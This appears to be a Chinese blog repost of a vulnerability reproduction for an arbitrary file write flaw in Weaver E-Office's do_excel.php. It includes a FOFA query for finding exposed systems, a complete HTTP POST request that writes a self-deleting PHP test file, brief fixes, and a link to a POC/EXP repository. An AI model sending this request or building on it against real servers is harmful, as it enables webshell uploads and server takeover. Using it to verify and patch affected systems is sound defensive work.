当前位置: 首页 > news >正文

【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞


》》》产品描述《《《

        泛微0-0fice是一款标准化的协同 OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。


》》》漏洞描述《《《

        泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。此漏洞严重威胁系统安全,可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。


》》》搜索语句《《《

app="泛微-EOffice"



》》》漏洞复现《《《

POST /general/charge/charge_list/do_excel.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alivehtml=<?php echo md5("1");unlink(__FILE__);?>

测试文件地址:/general/charge/charge list/excel.php
如果能解析php代码则存在漏洞


》》》修复建议《《《

1、如非必要,禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略,设置白名单访问。
3、升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

http://www.lryc.cn/news/452992.html

相关文章:

  • 算法(食物链)
  • ubuntu20.04系统安装zookeeper简单教程
  • .NET Core 高性能并发编程
  • B 私域模式升级:开源技术助力传统经销体系转型
  • vue之vuex的使用及举例
  • 使用 vite 快速初始化 shadcn-vue 项目
  • 微信小程序:一个小程序跳转至另一个小程序
  • Java第二阶段---10方法带参---第二节 方法重载(Overloading)
  • Java Web 之 Session 详解
  • 63.5 注意力提示_by《李沐:动手学深度学习v2》pytorch版
  • vscode 的terminal 输出打印行数限制设置
  • 深入挖掘C++中的特性之一 — 继承
  • Linux 下 poll 详解
  • virtualbox配置为NAT模式后物理机和虚拟机互通
  • 工程机械车辆挖掘机自卸卡车轮式装载机检测数据集VOC+YOLO格式2644张3类别
  • [Notepad++] 文本编辑器的下载及详细安装使用过程(附有下载文件)
  • 深入浅出Java多线程(六):Java内存模型
  • 注册了个小趴菜999#it#com
  • UE4 材质学习笔记02(数据类型/扭曲着色器)
  • Linux驱动开发(速记版)--设备树插件
  • 代码报错后如何定位问题
  • Python数据可视化--Matplotlib--入门
  • 美国食品等级FDA认证测试介绍
  • Vue2如何在网页实现文字的逐个显现
  • mybatisplus的查询,分页查询,自定义多表查询,修改的几种写法
  • 括号匹配判断
  • 数据结构(栈和队列的实现)
  • Python批量处理客户明细表格数据,挖掘更大价值
  • NAND Flash虚拟层索引表机制
  • Spring Boot框架:新闻推荐系统开发新趋势